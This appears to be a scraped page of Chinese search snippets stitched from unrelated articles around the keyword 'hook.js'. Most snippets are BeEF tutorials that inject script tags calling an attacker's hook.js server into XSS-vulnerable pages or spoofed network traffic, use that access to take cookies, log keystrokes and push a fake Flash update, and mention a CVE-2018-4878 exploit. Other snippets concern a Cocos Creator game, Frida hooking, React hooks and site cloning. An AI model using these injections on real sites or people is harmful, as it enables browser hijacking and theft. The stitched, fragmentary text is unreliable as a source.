0x00 实验工具 kali linux v2.0 beef-xss sunny-ngrok: http://www.ngrok.cc 0x01 开通tcp代理,并下载客户端进行内网穿透 都是老司机注册这里就不说了...注意这里远程端口号要和本地端口号保持一致,正常情况下可以不用这么填,但是hook.js在发送请求的时候会在后面自动追加端口号,造成无法成功请求,所以我就干脆设置成一样的了。...接下来就是下载客户端,进行连接了。在这个地址(http://www.ngrok.cc/download.html)下载相应的客户端版本。 具体命令是: ./sunny clientid 隧道id ?...接下来我们只要把hook.js脚本想办法加载到目标网站就可以实现对浏览器的攻击了,最起码get个cookie还是不成问题的。...实现基于beef的xss攻击 一般来说我们要加载一个js文件只需加入下边一行代码就可以: <script type="text/javascript" src="http://yoururl.com/<em>hook.js</em>
CocosCreator 2.2.0 下载地址: http://cocos2d-x.org/filedown/CocosCreator_v2.2.0_win 安装教程: 打开下载好的7z压缩包并解压...微信web开发者工具 下载地址: https://developers.weixin.qq.com/miniprogram/dev/devtools/download.html 安装教程:运行安装文件...资源下载: 链接: https://pan.baidu.com/s/1rpqBRE9hSBw7TnC3eEQT9w 提取码: 2s7y 设计尺寸 首先,这是一个竖屏游戏,而 Creator 默认创建的是横板游戏...3.在assets中创建脚本Hook.js,并将脚本作为组建添加到节点Hook上 ?...添加的方法为,点击节点Hook,在属性检查器中,添加组件添加用户脚本组件Hook.js 4.在Hook.js脚本中添加如下代码,来让鱼钩动起来: start () { this.node.runAction
针对此漏洞,网上已经有成熟的利用代码了,公众号直接回复CVE-2018-4878即可下载。来看看怎么利用吧~ 首先使用msfvenom生成一段python类型的shell代码: ?...攻击端配置完毕~~ 在靶机需要安装版本<= 28.0.0.137的flash,公众号直接回复CVE-2018-4878即可下载: ? 安装完毕后,使用浏览器访问kali攻击页面: ?...公众号回复CVE-2018-4878,下载安装存在存储型XSS的Catfishcms(DVWA也可以) 该CMS评论区存在存储型XSS: ?...//登录名和密码默认都是:beef 我们将hook.js页面插入到存储型XSS处: ?...使用burp发包:'"> ? 查看评论区留言: ?
这里我选择了BeEF框架进行配合,在流量中插入hook.js 5、既然BeEF可以配合MSF来攻击浏览器,那这里自然也少不了MSF的戏份 0×02 工具准备 EDUP 迷你USB无线网卡 免驱动 (RTL8188CUS...0×03 改造树莓派 首先让树莓派运行起来,玩过的人都知道怎么弄,下载镜像,写入镜像,不做赘述。...修改asset/inject/extern.js,在function中增加: var commandModuleStr = '<script src="http://172.16.6.37:3000/<em>hook.js</em>...貌似用BeEF控制用户的浏览器去<em>下载</em>一个后门文件,也是可以的。 0×08小结 1、都是前人的东西,只不过组合了一下而已,没有任何穿创新,比较水。...2、<em>hook.js</em>对手机浏览器没有任何效果 3、MSF的漏洞库比较并没有想象中那么强大,想要一举拿下被投毒的电脑,没有几个0day估计是搞不定的 4、忽然对360清空浏览器缓存的功能感到很纠结…… 5、
当前的最新版本就是15.1.24,那么就应该选择下面这个 image.png 下载后好解压,然后push 到 /data/local/tmp, 执行下面命令启动起来: chmod a+x frida-server...github.com/oleavr/frida-agent-example.git cd frida-agent-example npm install 接下来打开这个目录,就可以写js 代码了, 新建一个hook.js...$new('hooked')) } }) } setImmediate(main) 然后执行命令: frida -U -f com.tencent.mm -l hook.js
evil.com的时候,目标页面就会访问到我自己的域名,如果访问的域名页面中包含了 beef 的 hook.js,那目标不就上线了嘛,nice 开整!...测试一下,beef 的 hook.js 能不能访问 ?...在 beef 的 hook.js 页面可以成功访问之后,就可以构造 URL 了,这时只要 URL 后传入一个包含 hook.js 的页面就可以上线了,这里以 beef 的 demo 页面/demos/basic.html
我们这里随便下载个网站的源码(比如初音社的) 然后编辑这个加入我们的script ?...默认密码是beef:beef 之后 我们就可以用浏览器打开我们下载的离线HTML了 马上BeEF中就可以看到如下的显示 ?
所谓的钩子文件,直白点说就是一个让受害者在不知情的情况下,每秒跟beef服务器通信的脚本文件,当beef向受害者的浏览器发出指令时,hook.js脚本程序会执行相应的指令。...Hook_file的脚本链接为:http://192.168.231.154:3000/hook.js ?...Details(浏览器信息):当受害者执行hook.js脚本后,脚本会自动收集受害者的浏览器信息。...Logs(操作记录):相当于一个鼠标和键盘的记录器,但是它的作用域只在执行了hook.js脚本的Web网页。
实战演练 BeEF需要目标浏览器调用hook.js文件,它能让浏览器挂钩到我们的BeEF服务器,另外我们将利用一个易受XSS攻击的应用程序,让目标用户调用它: 1....q= 2. 现在,在BeEF面板中,攻击者将看到一个浏览器上线: 3....在浏览器被hook.js文件挂钩之后,目标用户在被域中导航攻击时,攻击者最好要让会话变为持久性的。...这个hook.js文件与服务器通信,执行命令,并返回响应,以便攻击者可以看到;它不会在客户端浏览器中打印任何内容,因此受害者通常不会知道他的浏览器已经被劫持。
enabled(254个利用模块) 接口控制面板:: running on network interface: 127.0.0.1 Hook URL: http://127.0.0.1:3000/hook.js...127.0.0.1:3000/ui/panel running on network interface: 192.168.1.106 Hook URL: http://192.168.1.106:3000/hook.js...="> 这时候BeEF控制台就会看到一个新的挂钩(僵尸)浏览器: ?
默认hook页面: http://ip:3000/demos/basic.html //访问即可被hook 往存在XSS漏洞的地方插入以下代码 ; 举个例子:往DVWA靶场插入xss代码 ; 那么在beef...上可以看到被嵌入hook.js的浏览器已经上线了 然后你可以选择各种攻击模块进行操作了 每个模块前面的颜色代表着不同的意义 实用攻击模块 使用下面模块的前提是你使用;控制了浏览器。...社会工程学攻击 模块:Social Engineering —> Fake Flash Update 在社工这一栏,可以选择flash更新这类功能来诱使用户升级Flash,当用户点击之后,会下载我们的恶意文件执行
MariaDB [(none)]> quit Bye 创建数据库(将产生一个空页): 访问页面 http://server-ip/reset_database.php 修改javascript钩子文件 hook.js...vulnerable_param= 然后,当受害者访问被挂钩的页面时,XSS利用工具服务器应该列出被挂钩的浏览器
输入命令: pip uninstall twisted shell 并用 wget 命令进行下载。...spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100 –inject –s-url http://192.168.15.131:3000/hook.js
安卓开发调用md5加密时候都会调用到系统类java.security.MessageDigest 加密时候会会调用里面2个关键方法update以及digest 根据这个原理我们开始写代码吧 二.代码 hook.js...: print("[*] {0}".format(message['payload'])) else: print(message) with open('hook.js
本文将基于上一讲的水果购物车(Hook.js)继续开发。再次展示一段代码重构的过程。 ?...setTimeout(() => { dispatch({type:'init', payload: ["草莓", "香蕉"]}); }, 1000); }; }; 使用(hook.js...模块化(combineReducers) 当前尽管hook.js已经非常好读,但是store还是一团糟。应该考虑把hook相关的逻辑(reducer)从是store中分离。...此处设置别名`fruit` combineReducers({ fruit: fruitReducer }), applyMiddleware(logger, thunk) ); 这时候,在组件Hook.js
在使用命令frida -U -f 包名 -l hook.js时报如下错误: Failed to spawn: need Gadget to attach on jailed Android; its default
下的 user是账号、passwd是密码,直接修改保存即可 启动Beef-Xss之后控制台会有一下信息 beef的xss代码格式: :3000/hook.js..."> 例子:比如我的KaliLinux的ip地址:192.168.56.129 </script
arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.106 --inject --js-url http://192.168.1.105:3000/hook.js...4.filepwn的原理就是在靶机下载可执行程序时将木马插入程序里,执行程序时就会启动木马,所以接下来我用靶机下载一个putty程序 ?
gScript.exports.callsignfun('6af6f31a-c608-4e01-97ad-2cf39cf17cf4','','1644299600595') return res 然后hook.js...这么写: // hook.js // 签名 function callSignFun(str1,str2,str3){ var result = 'null'; Java.perform(function
1.下载安装 https://teleport-pro.en.softonic.com/ 或者其他激活成功教程网站 2.运行扒站 打开软件后File -> New Project Wizard 里面可以选择许多...下载网站选择第一个。 输入想要下载的网址,和对应的下载深度。 选择仅下载文本或是全部。其次如果该网站需要登陆的话需要输入登陆网站的账户密码。...最后点击开始(三角形)按钮即可开始下载网站。...一键清除tppabs冗余标签 tppabs标签 Teleport Pro的作用是用来下载别人的整站,软件的功能虽然好,但是却有一个很头疼的缺点,那就是下载下来 的网页它会在图片标签内插入tppabs标签以记录该图片的原始地址
领取专属 10元无门槛券
手把手带您无忧上云